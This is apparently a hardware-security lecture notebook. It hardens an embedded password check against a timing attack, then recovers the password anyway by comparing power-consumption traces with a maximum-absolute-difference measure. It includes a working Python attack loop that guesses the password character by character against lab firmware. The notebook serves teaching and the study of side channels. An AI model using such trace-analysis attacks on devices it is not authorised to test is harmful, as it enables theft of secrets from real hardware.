# Lecture 3: Password Attack with Difference Analysis - Introduction

In this example we want to improve the basic passwdcheck to be resistant against the attack from the last tutorial.

## Improving the code

Let's first recap the password checking loop from the basic passwdcheck:
```c
for(uint8_t i = 0; i < sizeof(stored_password); i++)
{
    if (stored_password[i] != passwd[i])
    {
        password_correct = 0;
        break;
    }
}
```

The timing attack discussed in the last example worked because the loop's runtime varies with the number of correct characters. Once the first wrong character occurs the loop breaks.
This is, what we want to change:

```c
for(uint8_t i = 0; i < sizeof(stored_password); i++)
{
    if (stored_password[i] != passwd[i])
    {
        password_correct = 0;
    }
}
```

This is an excerpt from `3_password_fixed.c`. It is clear that the loop does not break after the first wrong character and always all characters of the password are checked.

## Develop a new idea

In [None]:
import securec
from securec import util
scope, target = util.init()

In [None]:
securec.util.compile_and_flash('./3_password_fixed.c')

In [None]:
import struct
import time
import warnings
    
scope.default_setup()
scope.adc.samples = 500

def capture(attempt):
    scope.arm()
    target.simpleserial_write('p', attempt.encode('ascii') + b'\x00' * (10 - len(attempt)))
    result = target.simpleserial_read('p', 1)
    return util.capture(), not bool(result[0])

In [None]:
from bokeh.plotting import figure, show 
from bokeh.io import output_notebook
from bokeh.models import CrosshairTool
from bokeh.palettes import Category10_10

output_notebook()

In [None]:
traces = [(attempt, capture(attempt)[0]) for attempt in ('\x00', 'a', 'i')]

In [None]:
p = figure(width=900, height=200)
p.add_tools(CrosshairTool())
for idx, ((attempt1, trace1), (attempt2, trace2)) in enumerate([
    (traces[0], traces[1]),
    (traces[0], traces[2]),
]):
    p.line(
        range(len(trace1)), 
        abs(trace1 - trace2), 
        line_color=Category10_10[idx],
        legend_label=f'abs({attempt1} - {attempt2}) with MAD = {max(abs(trace1 - trace2)):.2f}'
    )
show(p)

## MAD password attack

Given two traces $t_1, t_2$ their MAD value is defined as:
$$\text{MAD}(t_1, t_2) := \text{max}\big( \big| t_1[i] - t_2[i] \big| \big),$$
where $t[i]$ is the value of trace $t$ at point $i$.

In [None]:
def mad(trace1, trace2):
    return max(abs(trace1 - trace2))

In [None]:
def attack_password_mad(
    mad_threshold=0.05,
    charlist='abcdefghijklmnopqrstuvwxyz0123456789',
    basechar='\x00',
):
    result = False
    password = ''

    while not result or len(password) > 9:
        basetrace, _ = capture(password + basechar)
        for c in charlist:
            trace, result = capture(password + c)
            if mad(trace, basetrace) > mad_threshold:
                password += c
                print(f'success: "{c}" => password = {password}')
                break
        else:
            print('no found')
            break
    return password, result

In [None]:
attack_password_mad()

In [None]:
util.exit()